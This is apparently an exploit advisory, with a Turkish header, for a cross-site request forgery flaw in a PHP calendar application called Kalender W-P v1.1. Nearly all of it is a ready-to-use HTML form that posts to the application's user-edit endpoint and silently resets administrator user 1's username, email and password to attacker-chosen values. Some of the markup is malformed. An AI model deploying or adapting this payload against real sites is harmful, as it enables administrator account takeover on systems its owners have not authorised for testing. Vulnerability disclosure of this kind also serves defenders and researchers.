< ------------------- header data start ------------------- >
#############################################################

# Application Name :Kalender W-P v1.1

# Vulnerable Type : XSRF

# Infection : Uzaktan otomatik olarak admin bilgileri degistirebilinir.

# author : Fl0riX - Bug Researchers

# Demo : http://www.web-php.de/demo/100017/event.php

#############################################################
< ------------------- header data end of ------------------- >
<form method=post action=http://www.site/[PATH]/100017/event_intern.php?action=user_2>
<input type=hidden name=send value=1a>
<input type=hidden name=user_id value=1>
<input type=text class=input name=benutzername value=Fl0riXsize=30>
><input type=text class=input name=emailvalue=[email protected]=30>
<input type=text class=input name=passwort value=Fl0riX size=30>
<input class=ab name=B1 type=Submit value=attackFl0baba>
</form>
< -- bug code end of -- >